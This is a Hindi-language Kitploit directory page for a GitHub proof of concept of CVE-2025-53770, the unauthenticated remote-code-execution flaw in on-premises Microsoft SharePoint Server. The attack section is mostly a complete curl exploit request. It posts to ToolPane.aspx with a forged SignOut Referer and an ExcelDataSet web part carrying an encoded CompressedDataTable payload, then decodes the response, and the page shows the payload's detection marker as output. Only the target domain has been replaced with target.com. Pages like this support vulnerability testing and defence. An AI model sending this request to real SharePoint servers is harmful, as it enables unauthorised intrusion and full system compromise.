Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-53770 — अप्रमाणित रिमोट कोड निष्पादन Microsoft SharePoint Server में असुरक्षित deserialization के माध्यम से (CVE-2025-53770) | Kitploit
उपकरण/GitHubGitHub/muhammadwaseem29/cve-2025-53770
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubmuhammadwaseem29/cve-2025-53770

CVE-2025-53770

अप्रमाणित रिमोट कोड निष्पादन Microsoft SharePoint Server में असुरक्षित deserialization के माध्यम से (CVE-2025-53770)

रिपॉजिटरी देखें
58421 साल पहलेKitploit द्वारा समीक्षित
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-53770 SharePoint डिसीरियलाइज़ेशन RCE PoC

गंभीर — Microsoft SharePoint Server में असुरक्षित डिसीरियलाइज़ेशन के माध्यम से अप्रमाणित दूरस्थ कोड निष्पादन (CVE-2025-53770)

विवरण

ऑन-प्रिमाइसेस Microsoft SharePoint Server में अविश्वस्त डेटा का डिसीरियलाइज़ेशन एक हमलावर को दूरस्थ रूप से कोड निष्पादित करने और सिस्टम से समझौता करने की अनुमति देता है। Microsoft सक्रिय शोषण से अवगत है और एक व्यापक अपडेट तैयार कर रहा है। सुनिश्चित करें कि CVE दस्तावेज़ीकरण से शमन उपाय लागू हैं।

  • प्रभाव: अप्रमाणित हमलावर दूरस्थ कोड निष्पादन प्राप्त कर सकते हैं, जिससे पूर्ण सिस्टम समझौता हो सकता है।
  • गंभीरता: गंभीर

प्रमाण-अवधारणा

निम्नलिखित PoC दर्शाता है कि कैसे एक हमलावर कमजोर एंडपॉइंट के माध्यम से दुर्भावनापूर्ण पेलोड निकालने और डीकोड करने के लिए भेद्यता का शोषण कर सकता है।

लक्ष्य डोमेन जानबूझकर target.com से बदल दिया गया है।

कमांड

root@kitploit:~
curl -sk -X POST 'https://target.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://target.com' \
  --data-urlencode 'MSOTlPn_DWP=
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>' \
| grep -oP 'CompressedDataTable=&quot;\K[^&]+(?=&quot;)' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

आउटपुट

root@kitploit:~
<Info>IntruderScannerDetectionPayload</Info>
छवि

संदर्भ

  • परीक्षण पेलोड कार्यान्वयन
  • कोड व्हाइट सुरक्षा विश्लेषण
  • Microsoft मार्गदर्शन
  • NVD प्रविष्टि

प्रभाव:
अप्रमाणित हमलावर SharePoint Server पर दूरस्थ कोड निष्पादन प्राप्त करने के लिए असुरक्षित डिसीरियलाइज़ेशन का शोषण कर सकते हैं, जिससे पूर्ण सिस्टम समझौता हो सकता है।

टूल डाउनलोड करें